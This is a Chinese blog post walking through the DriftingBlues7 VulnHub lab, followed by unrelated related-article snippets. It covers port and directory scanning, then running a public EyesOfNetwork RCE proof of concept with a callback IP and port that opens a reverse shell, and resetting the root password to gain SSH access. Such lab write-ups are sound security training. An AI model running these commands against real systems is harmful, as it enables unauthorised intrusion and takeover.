【driftingblues7_vh】靶场记录

最新推荐文章于 2024-07-31 12:20:16 发布
最新推荐文章于 2024-07-31 12:20:16 发布
阅读量140 收藏
点赞数
分类专栏: 靶机 文章标签: ssh 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46411728/article/details/129131023
版权

一、信息收集

查找靶机IP
命令:netdiscover -i eth0 -r 192.168.236.0/24
在这里插入图片描述

1、端口扫描

命令:nmap -sV -T4 -A -p- 192.168.236.169
在这里插入图片描述22端口尝试ssh密码爆破

在这里插入图片描述66端口,访问,无信息
在这里插入图片描述

在这里插入图片描述
80端口无信息

在这里插入图片描述
111端口无信息
在这里插入图片描述
在这里插入图片描述
443端口访问,为登陆页面,尝试是否存在sql注入
在这里插入图片描述

在这里插入图片描述
2403端口,无信息
在这里插入图片描述

3306数据库,可登录查看敏感信息

8086端口,无信息
在这里插入图片描述

2、目录扫描

命令:gobuster dir -u http://192.168.236.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

无信息
在这里插入图片描述

命令:gobuster dir -u http://192.168.236.169:66/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip在这里插入图片描述
flag.txt无信息

3、端口号及版本搜索

在这里插入图片描述

二、尝试渗透

1、登陆页面SQL注入尝试

命令:sqlmap -r /home/kali/桌面/1.txt --batch
并没有什么信息
在这里插入图片描述

2、弱口令登录

尝试几个弱口令,都失败

3、查找已知的框架漏洞

查找这个eyesofnetwork框架是否存在已知的漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

下载POC使用:
命令:git clone https://github.com/h4knet/eonrce
在这里插入图片描述
在这里插入图片描述

命令:./eonrce.py https://192.168.236.169/ -ip 192.168.236.128 -port 4444

在这里插入图片描述

最高权限:root
在这里插入图片描述

命令:passwd root
设置密码:toor
ssh登录:命令:ssh 192.168.236.169
密码:toor
在这里插入图片描述

三、总结

1、联系靶场的话,不能放过任何一个有用信息,登陆页面的框架一定要搜索
2、框架漏洞,要善于搜索

学安全的废物
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub 之driftingblues7_vh
鲨鱼辣椒的博客
06-09 443
目录 信息搜集 扫描网段 扫描IP地址 扫描网站目录 查看网站 发现漏洞 GETSHELL 总结 信息搜集 扫描网段 发现网站真实IP 扫描IP地址 发现开启的端口以及服务,以及中间件的一些版本信息(这可能会是我们后续渗透的突破点) 扫描网站目录 dirsearch -u https://192.168.179.137/ 虽然我并没有扫出什么有用的东西,但是这个扫的动作很重要,有时候就是一些不起眼的地方会给我们意想不到的惊喜(一定要注重细节,对于我们渗透.
靶机:driftingblues7_vh
weixin_50339323的博客
08-03 278
一、信息收集 1、靶机ip 扫描存活靶机: nmap -sP 192.168.8.0/24 2、靶机端口 namp -sC -sV 192.168.8.131 显示开放的端口有:22 、80、111、443、3306、8086 3、网站信息收集 访问192.168.8.131 一个登录页面 查看源码,源码内有很多链接,逐一查看,一个网页内有Eyes ofNetwork 的相关信息,包括版本 搜索EyesOfNetwork相关信息,是一个构架管理,...
vulnhub靶机 | DriftingBlues:7
在下小黄的博客
06-07 1060
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路 微信公众号回复:【靶机】,即可获取本文全部涉及到的工具。 创建时间:2021年6月7日 软件: MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言:信息搜
vulnhub实战——DRIFTINGBLUES: 7
Ar_Gin Work
04-18 658
vulnhub实战——Driftingblues7 前言 无聊发现vulnhub上一个新靶机,下载来玩玩看,挺简单的。搜了搜没教程就写个教程给大家参考一下吧~ 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 可以直接用VM打开,ip会自动获取并显示出来(挺人性化的) 正文 通过nmap扫描靶机nmap -sV -O 192.168.171.134 发现有80端口,我们访问一下发现为一个登录页面,后台名称为EyesOfNetwork 再目录
Vulnhub靶机driftingblues6_vh
weixin_43967893的博客
04-19 695
Vulnhub_driftingblues6 zip破解,php_reverse,脏牛提权
Datasheet_VH_GigE_R001EN.pdf
12-21
VH系列相机的具体型号包括VH-310G2、VH-2MG2、VH-4MG2、VH-5MG2、VH-11MG2和VH-16MG2,分别提供VGA、2、4、5、11和16百万像素的分辨率。每款相机都配备有不同规格的传感器,如Truesense Imaging的KAI-0340、KAI-2020...
pmw.rar_PMW_pmw vh
09-23
标题中的"pmw.rar_PMW_pmw vh"可能是指一个关于PWM(脉宽调制,Pulse Width Modulation)技术的工程实现,特别是在VHDL(Very High Speed Integrated Circuit Hardware Description Language)环境下进行的设计。...
CANoe_VH6501_采样点测试CAPL程序
01-18
CANoe VH6501 采样点测试CAPL程序主要涉及了汽车电子通信网络中的CANoe软件和VH6501硬件设备在测试CAN总线系统中的采样点性能的方法。下面是详细的知识点说明: 1. **CANoe软件**:CANoe是一款广泛应用于汽车电子...
VB_VH-Protocol_TC.PDF
03-11
丰炜PLC VB VH通信协议是用于VB (Visual Basic)编程与丰炜PLC (可编程逻辑控制器)之间进行串口通信的一种协议。该协议基于非同步串列半双工传输方式,允许用户通过编程控制PLC的输入、输出以及读取或写入内部状态。...
shumaguan.rar_VHDL 数码管_数码管VH
09-19
【标题】"shumaguan.rar_VHDL 数码管_数码管VH" 涉及的关键技术是VHDL编程语言在实现数码管显示的应用。VHDL(Very High Speed Integrated Circuit Hardware Description Language)是一种硬件描述语言,用于描述...
本地部署VMware ESXi服务实现无公网IP远程访问管理服务器
weixin_44976692的博客
07-26 3278
在虚拟化技术日益成熟的今天,VMware ESXi以其卓越的性能和稳定性,成为了众多企业构建虚拟化环境的首选。然而,随着远程办公和跨地域管理的需求增加,如何高效地远程访问和管理部署在本地数据中心的ESXi服务器,成为了企业IT部门面临的重要挑战。传统的远程访问方式往往受限于网络配置复杂、IP地址固定以及安全性能不足等问题,难以满足现代企业对于灵活、安全、高效的远程管理需求。为了解决这一难题,我们可以借助Cpolar内网穿透技术,将本地ESXi服务器的访问能力扩展到公网,实现随时随地的远程访问和管理。
项目部署到服务器
2301_80034662的博客
07-25 437
下载MobaXterm。
Linux基础命令
weixin_68540670的博客
07-25 1492
Linux中一切从根开始Linux中一切皆文件。
C语言中的IO控制流
zhangyuanhang123的博客
07-24 857
linux系统中一切皆文件,C语言中的IO控制流就是用于操作文件的一组函数。
Linux初学基本命令
yuan20010401的博客
07-25 575
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4960
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
60个常见的 Linux 指令
yatingliu的博客
07-25 1298
是 “substitute user” 或 “switch user” 的缩写,它可以让你切换到另一个用户账户,包括 root 用户。是 “manual” 的缩写,通过它你可以访问系统的手册页(manual pages),这些手册页提供了详细的使用说明和参考信息。在一些 Linux 发行版中,adduser 是 useradd 的一个友好封装,功能上类似但提供了更多的默认设置和提示。-f, --force:强制删除,不提示错误信息,即使文件不存在也不会报错。:设置密码过期时间,单位为天。
【C语言】Linux 飞翔的小鸟
Minuhy
07-22 810
Linux下运行的,用C语言编写的飞翔的小鸟,一款挺无聊的小游戏,分享给大家~
Linux】多路转接 -- select函数
最新发布
m0_72940975的博客
07-31 1046
多路转接也叫多路复用,是一种用于管理多个IO通道的技术。它能实现同时监听和处理多个IO事件,而不是为每个IO通道创建单独的线程或者进程,多路转接允许在单个进程或线程中同时处理多个IO操作,从而提高程序的性能和效率。本篇文章介绍的select函数,就用于select系统调用的多路转接技术。select函数是系统提供的一个多路转接接口。IO = 等待就绪 + 数据拷贝,而select是只负责等。 参数说明:参数timeout的取值:返回值说明:select调用失败,错误码可能被设置为:fd_set 结构与 si
trace_android_vh_sysrq_crash
07-28
关于 "trace_android_vh_sysrq_crash" 这个问题,我了解到它是一个与 Android 系统的 sysrq 键有关的崩溃追踪。sysrq 键是一个特殊的键,可以用于触发紧急操作,比如系统重启或内核转储。当系统在处理 sysrq 键时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值